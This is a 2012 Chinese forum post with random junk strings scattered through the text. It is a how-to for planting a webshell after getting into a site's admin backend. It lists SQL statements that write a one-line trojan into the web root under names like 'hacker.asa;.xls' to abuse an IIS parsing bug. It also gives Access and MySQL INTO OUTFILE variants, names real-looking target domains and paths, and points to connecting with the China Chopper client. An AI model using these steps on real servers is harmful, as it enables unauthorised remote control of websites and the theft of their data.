好不容易进了后台,发现啥上传啊。备份啊多木有。4 j$ v1 U5 h- x0 X, J L' V
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的. D6 h- ?+ h5 I C5 |
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
' u; s/ W9 x7 ?/ E然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
3 Q( x _% |3 p( [: v' T% {% r3 A1.create table cmd (a varchar(50))& y+ {( Z o8 j- ^$ m. n+ |/ W& W
2.insert into cmd (a) values (‘‘)
d! d! X! J, {9 j8 f# T1 y- u3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
; c c4 l$ ^8 `(把表cmd的内容导出为物理路径的一个EXCEL文件); \- D! C% T: v5 k6 u
4.drop table cmd
) Y, F1 {( x2 }利用IIS的BUG成功拿到了WEBSHELL。 o* H% n0 \. {2 m( u7 u
: e) \2 c* b/ Q; K% s% ~5 N
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
( m8 `# U- ?' D+ z9 H6 }9 z* Q( Y0 I2 X( e$ E( n/ L
SQL语句意思解释:3 W8 X+ _2 y2 D4 q) M5 Q& ~+ }+ F
第一句$ k, ?% f4 a/ _$ x
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
" [7 Z6 O; l" k4 n) E
$ U. A4 T7 j' ?9 B, R& {1 a: M 第二句
' g# T6 F, M# I d1 d 在表cmd的a字段插入一句话木马& y+ E. D3 a! F3 q$ _5 Q
第三句
& x t, i2 g) `' K$ r 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
4 J5 T1 y& [, s4 l7 P0 W( p8 v) O/ q. l6 F: l5 u& U
第四句& e, j! w/ _5 T1 c
删除建立的cmd表) f- A/ ]3 c. w1 n+ Q' r
' C4 H' C& [* Y! U 以下内容为测试:& ^' {5 ?9 C6 H7 \4 j% f4 @
Access利用后台SQL执行命令功能导出WebShell:
1 Z0 G+ V4 z8 A# M 这个更简单:+ t! I$ {0 I8 u1 t
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]+ Y1 P' Q1 Q u% D3 ]8 b/ Y
或者6 X& R: \, [$ l% ]8 {% q9 |
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
5 p" u: V4 S$ T
9 ?5 h5 O9 \# g |* k+ i7 l 后台有执行SQL语句功能(vote为已知表段)
4 K$ k4 y* d; A5 {8 C. C 希望对大家有所帮助拿shell的又一个思路" {$ i% W/ v% X, A3 ~
|
发表于 2012-9-13 17:53:58
收藏
支持
反对